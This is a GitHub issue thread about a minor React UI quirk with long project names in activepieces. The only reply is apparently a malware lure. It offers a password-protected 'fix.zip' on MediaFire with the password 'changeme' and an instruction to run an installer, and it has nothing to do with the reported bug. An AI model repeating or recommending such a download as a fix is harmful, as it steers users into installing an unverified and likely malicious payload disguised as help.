### ISSUE TITLE
[BUG]: React - issue with longer project names

### ISSUE THREAD

**Issue by alexandrudanpop** [activepieces/activepieces#5429]
**Describe the bug**
Small UI quirk:
![image](https://github.com/user-attachments/assets/66719190-1251-456e-8df4-466e787bfc7d)

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
